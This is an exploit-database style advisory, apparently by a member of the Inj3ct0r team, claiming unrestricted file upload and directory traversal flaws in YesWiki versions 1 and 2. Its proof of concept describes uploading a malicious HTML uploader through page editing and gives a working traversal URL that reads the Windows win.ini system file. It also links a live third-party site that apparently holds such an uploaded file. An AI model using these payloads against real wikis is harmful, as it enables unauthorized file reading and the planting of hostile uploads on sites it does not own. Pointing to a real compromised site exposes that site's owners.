YesWiki versions 1 and 2 suffers from remote arbitrary file upload and directory traversal vulnerabilities.
ee86e160c76d7dc73d0165e915aca4364f9f5d3507ade379098299763d7ce7ff
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : souk naamane 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm indoushka member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
| # Title : yeswiki v1+2 unrestricted file upload Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : (>^_^)> Galope sous YesWiki <(^_^<)
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : http://www.yeswiki.net/
========================================================================
poc:
I- unrestricted file upload :
Creat or edit pages and join your Ev!l uploader .html
go to http://127.0.0.1/yeswiki/files/diaporama/ 3v!l-up.html or http://127.0.0.1/yeswiki/files/
Live : http://maraichagesolvivant.org/files/PagePrincipale_up_20151203204715_20151207164247.html_
II - Directory Traversal :
http://127.0.0.1/yeswiki/wakka.php?wikiUrl=../../../../../../../../../../windows/win.ini
Greetz :
jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be
---------------------------------------------------------------------------------------------------------------